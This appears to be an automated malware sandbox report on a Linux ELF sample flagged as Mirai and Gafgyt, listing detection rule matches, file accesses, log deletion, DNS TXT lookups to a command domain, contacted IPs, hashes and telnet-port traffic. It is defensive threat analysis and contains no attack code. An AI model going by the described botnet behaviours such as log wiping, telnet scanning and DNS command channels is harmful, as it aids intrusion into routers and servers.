      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
      Source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
      Source: classification engineClassification label: mal92.troj.evad.linELF@0/1@31/0

      Data Obfuscation

      barindex
      Sample tries to access files in /etc/config/ (typical for OpenWRT routers)
      Source: /tmp/i686.elf (PID: 6254)File: /etc/configJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /root/.cacheJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /root/.sshJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /root/.configJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /root/.localJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.X11-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.Test-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.font-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.ICE-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /tmp/.XIM-unixJump to behavior
      Source: /tmp/i686.elf (PID: 6254)Directory: /etc/.javaJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/230/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/110/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/231/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/111/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/232/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/112/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/233/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/113/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/234/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/114/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/235/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/115/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/236/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/116/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/237/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/117/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/118/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/910/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/119/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/912/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/10/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/11/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/918/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/12/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/13/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/14/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/15/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/16/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/17/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/18/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/120/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/121/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/1/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/122/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/243/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/123/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/2/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/124/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/3/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/4/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/125/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/126/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/127/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/6/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/248/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/128/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/249/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/800/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/9/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/801/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/20/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/21/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/22/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/23/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/24/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/25/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/26/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/27/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/28/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/29/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/491/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/250/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/130/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/251/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/252/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/132/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/253/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/254/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/255/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/256/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/257/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/379/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/258/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/259/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/936/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/30/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/35/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/260/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/261/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/141/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/262/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/263/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/264/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/144/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/265/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/266/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/267/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/269/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/270/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/272/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/274/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/278/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/157/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/281/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/286/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/720/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/721/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/847/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/77/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/78/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/79/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/80/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/81/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/82/fdJump to behavior
      Source: /tmp/i686.elf (PID: 6253)File opened: /proc/83/fdJump to behavior
      Source: /usr/bin/dash (PID: 6232)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.HqFju0SPpt /tmp/tmp.kLRmTDpoAt /tmp/tmp.hnjsezfpAXJump to behavior
      Source: /usr/bin/dash (PID: 6233)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.HqFju0SPpt /tmp/tmp.kLRmTDpoAt /tmp/tmp.hnjsezfpAXJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Deletes system log files
      Source: /tmp/i686.elf (PID: 6254)Log files deleted: /var/log/kern.logJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Performs DNS TXT record lookups
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre
      Source: TrafficDNS traffic detected: queries for: ai.stackoverflow.libre

      Stealing of Sensitive Information

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: i686.elf, type: SAMPLE
      Source: Yara matchFile source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected Mirai
      Source: Yara matchFile source: i686.elf, type: SAMPLE
      Source: Yara matchFile source: 6271.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6231.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid AccountsWindows Management Instrumentation1
      Scripting      		Path Interception1
      Hidden Files and Directories      		1
      OS Credential Dumping      		System Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Indicator Removal      		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Standard Port      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion      		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
      Application Layer Protocol      		Traffic DuplicationData Destruction

      Malware Configuration

      No configs have been found

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584145 Sample: i686.elf Startdate: 04/01/2025 Architecture: LINUX Score: 92 22 ai.stackoverflow.libre 2->22 24 188.166.182.194, 10321, 18234, 31428 DIGITALOCEAN-ASNUS Netherlands 2->24 26 12 other IPs or domains 2->26 28 Suricata IDS alerts for network traffic 2->28 30 Malicious sample detected (through community Yara rule) 2->30 32 Multi AV Scanner detection for submitted file 2->32 36 3 other signatures 2->36 7 i686.elf 2->7         started        9 dash rm 2->9         started        11 dash rm 2->11         started        signatures3 34 Performs DNS TXT record lookups 22->34 process4 process5 13 i686.elf 7->13         started        16 i686.elf 7->16         started        18 i686.elf 7->18         started        20 2 other processes 7->20 signatures6 38 Sample tries to access files in /etc/config/ (typical for OpenWRT routers) 13->38 40 Deletes system log files 13->40

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      i686.elf30%VirustotalBrowse
      i686.elf37%ReversingLabsLinux.Trojan.Mirai
      i686.elf100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      ai.stackoverflow.libre
      		unknown
      		unknowntrue
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http:///wget.shi686.elffalse
          		high
          http:///curl.shi686.elffalse
            		high

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            176.165.177.4
            		unknownFrance
            		5410BOUYGTEL-ISPFRfalse
            132.205.38.242
            		unknownCanada
            		376RISQ-ASCAfalse
            109.202.202.202
            		unknownSwitzerland
            		13030INIT7CHfalse
            111.20.77.101
            		unknownChina
            		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
            54.171.230.55
            		unknownUnited States
            		16509AMAZON-02USfalse
            188.166.182.194
            		unknownNetherlands
            		14061DIGITALOCEAN-ASNUStrue
            7.225.0.137
            		unknownUnited States
            		3356LEVEL3USfalse
            17.199.119.32
            		unknownUnited States
            		714APPLE-ENGINEERINGUSfalse
            9.154.164.42
            		unknownUnited States
            		3356LEVEL3USfalse
            148.229.207.112
            		unknownMexico
            		32098TRANSTELCO-INCUSfalse
            74.125.250.129
            		unknownUnited States
            		15169GOOGLEUSfalse
            91.189.91.43
            		unknownUnited Kingdom
            		41231CANONICAL-ASGBfalse
            91.189.91.42
            		unknownUnited Kingdom
            		41231CANONICAL-ASGBfalse

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            54.171.230.55Space.x86.elfGet hashmaliciousUnknownBrowse
              Space.m68k.elfGet hashmaliciousUnknownBrowse
                Fantazy.arc.elfGet hashmaliciousUnknownBrowse
                  bot.ppc.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                    ub8ehJSePAfc9FYqZIT6.i686.elfGet hashmaliciousUnknownBrowse
                      154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elfGet hashmaliciousMiraiBrowse
                        boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                          x86_64.elfGet hashmaliciousMiraiBrowse
                            MIPS.elfGet hashmaliciousUnknownBrowse
                              MIPSEL.elfGet hashmaliciousUnknownBrowse
                                109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                91.189.91.43Space.x86.elfGet hashmaliciousUnknownBrowse
                                  Space.mips.elfGet hashmaliciousUnknownBrowse
                                    Space.m68k.elfGet hashmaliciousUnknownBrowse
                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                        79.133.46.252-sora.ppc-2025-01-04T09_02_51.elfGet hashmaliciousUnknownBrowse
                                          Kloki.arm7.elfGet hashmaliciousMiraiBrowse
                                            Kloki.spc.elfGet hashmaliciousUnknownBrowse
                                              Kloki.arm6.elfGet hashmaliciousMiraiBrowse
                                                Fantazy.arm5.elfGet hashmaliciousUnknownBrowse
                                                  jefne64.elfGet hashmaliciousMiraiBrowse

                                                    Domains

                                                    No context

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    RISQ-ASCAkwari.ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 132.209.121.199
                                                    telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                    • 207.162.6.16
                                                    x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 132.208.86.50
                                                    mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 132.215.171.68
                                                    jew.mips.elfGet hashmaliciousUnknownBrowse
                                                    • 132.211.201.159
                                                    armv7l.elfGet hashmaliciousMiraiBrowse
                                                    • 132.211.184.71
                                                    rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 132.205.1.119
                                                    rebirth.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 132.213.234.142
                                                    sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                    • 132.208.17.6
                                                    loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                    • 192.219.126.110
                                                    INIT7CHSpace.x86.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    Space.mips.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    Space.m68k.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    79.133.46.252-sora.ppc-2025-01-04T09_02_51.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    Kloki.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 109.202.202.202
                                                    Kloki.spc.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    Kloki.arm6.elfGet hashmaliciousMiraiBrowse
                                                    • 109.202.202.202
                                                    Fantazy.arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    Fantazy.i486.elfGet hashmaliciousUnknownBrowse
                                                    • 77.109.170.26
                                                    BOUYGTEL-ISPFRDEMONS.arm.elfGet hashmaliciousUnknownBrowse
                                                    • 176.154.232.159
                                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                                    • 176.180.230.49
                                                    loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                    • 176.191.139.13
                                                    kwari.mpsl.elfGet hashmaliciousUnknownBrowse
                                                    • 176.179.117.147
                                                    loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                    • 176.148.124.171
                                                    loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                    • 176.140.161.188
                                                    arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 146.105.200.128
                                                    mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 87.91.134.166
                                                    db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                                                    • 5.51.240.11
                                                    xd.mips.elfGet hashmaliciousMiraiBrowse
                                                    • 176.159.188.191

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    /athens.txt

                                                    Download File
                                                    Process:/tmp/i686.elf
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):146
                                                    Entropy (8bit):4.024394204278479
                                                    Encrypted:false
                                                    SSDEEP:3:TBGTD+FN5CSNE4F58SASI7AWHF5x5mAR/VB6GEDwcL7uoL/:TBGD+5F+RLl0AR/VgGEDLHB/
                                                    MD5:E77B19565FA2C8C6B780A198F3889313
                                                    SHA1:4B18D7D88944804C96620323D60EE89E4B985BB4
                                                    SHA-256:F71785724FCE340C9FF9CD4341B920A602A47C0B496C57CCA177B94CB4BA297D
                                                    SHA-512:D22AAC8ADD55BCD9672465F3E67AF9DD4B69C0C85903C16A1C19ABDEA59EA0674DF69FF7D7F646FE642417103C7D4B6B5B3B1D5A8017C321417CBC5B3C243732
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:The gods watch from the heavens? Let them see what a mortal can become. let them witness a man who defies their will and carves his own destiny...

                                                    Static File Info

                                                    General

                                                    File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                    Entropy (8bit):6.267385184754243
                                                    TrID:
                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                    File name:i686.elf
                                                    File size:91'504 bytes
                                                    MD5:de886e3e02a867403aebfc5f52c0c7e7
                                                    SHA1:52d5514bc95dbecbd2a631686814d4b45a31cc64
                                                    SHA256:2f11adfdb530423be5429348227dbd1a22de1d328ee1c13aeebd7b927910d618
                                                    SHA512:30dacecb5dce255b57a49de1a6621f1fddeb656522c818e8d1d1f36214dca95a2ac49e9ef19d74f96d4db8035465c06e9277368eec9bdb8476eb638434f2bf43
                                                    SSDEEP:1536:4j3Sfr/YmJdfYdfmuADiizszst7rkL8BGxzyOb9lfvMj5eMj9kBN:EM/YmJdA8niiQ8BcyObfvRau
                                                    TLSH:C1932943B4D0CDFEC499C5360B9B9136EB32F66D2225728B1794BB312A4EE203F1D569
                                                    File Content Preview:.ELF..............>.......@.....@........b..........@.8...@.......................@.......@......\.......\.......................\.......\Q......\Q..............q..............Q.td....................................................H...._........H........

                                                    Static ELF Info

                                                    ELF header

                                                    Class:ELF64
                                                    Data:2's complement, little endian
                                                    Version:1 (current)
                                                    Machine:Advanced Micro Devices X86-64
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x400194
                                                    Flags:0x0
                                                    ELF Header Size:64
                                                    Program Header Offset:64
                                                    Program Header Size:56
                                                    Number of Program Headers:3
                                                    Section Header Offset:90864
                                                    Section Header Size:64
                                                    Number of Section Headers:10
                                                    Header String Table Index:9

                                                    Sections

                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                    NULL0x00x00x00x00x0000
                                                    .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                    .textPROGBITS0x4001000x1000x115d60x00x6AX0016
                                                    .finiPROGBITS0x4116d60x116d60xe0x00x6AX001
                                                    .rodataPROGBITS0x4117000x117000x45100x00x2A0032
                                                    .ctorsPROGBITS0x515c180x15c180x100x00x3WA008
                                                    .dtorsPROGBITS0x515c280x15c280x100x00x3WA008
                                                    .dataPROGBITS0x515c400x15c400x6700x00x3WA0032
                                                    .bssNOBITS0x5162c00x162b00x6ae80x00x3WA0032
                                                    .shstrtabSTRTAB0x00x162b00x3e0x00x0001

                                                    Program Segments

                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x4000000x4000000x15c100x15c106.33520x5R E0x100000.init .text .fini .rodata
                                                    LOAD0x15c180x515c180x515c180x6980x71902.54790x6RW 0x100000.ctors .dtors .data .bss
                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-04T14:13:01.897730+01002013514ET MALWARE Potential DNS Command and Control via TXT queries1192.168.2.235018594.16.114.25453UDP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 4, 2025 14:12:47.923834085 CET4433360654.171.230.55192.168.2.23
                                                    Jan 4, 2025 14:12:47.923954010 CET33606443192.168.2.2354.171.230.55
                                                    Jan 4, 2025 14:12:47.928796053 CET4433360654.171.230.55192.168.2.23
                                                    Jan 4, 2025 14:12:48.142956018 CET3982423192.168.2.237.225.0.137
                                                    Jan 4, 2025 14:12:48.147748947 CET23398247.225.0.137192.168.2.23
                                                    Jan 4, 2025 14:12:48.148607969 CET3982423192.168.2.237.225.0.137
                                                    Jan 4, 2025 14:12:48.154382944 CET5657423192.168.2.23111.20.77.101
                                                    Jan 4, 2025 14:12:48.158274889 CET5443823192.168.2.2317.199.119.32
                                                    Jan 4, 2025 14:12:48.159147978 CET2356574111.20.77.101192.168.2.23
                                                    Jan 4, 2025 14:12:48.159190893 CET5657423192.168.2.23111.20.77.101
                                                    Jan 4, 2025 14:12:48.161547899 CET5349623192.168.2.23132.205.38.242
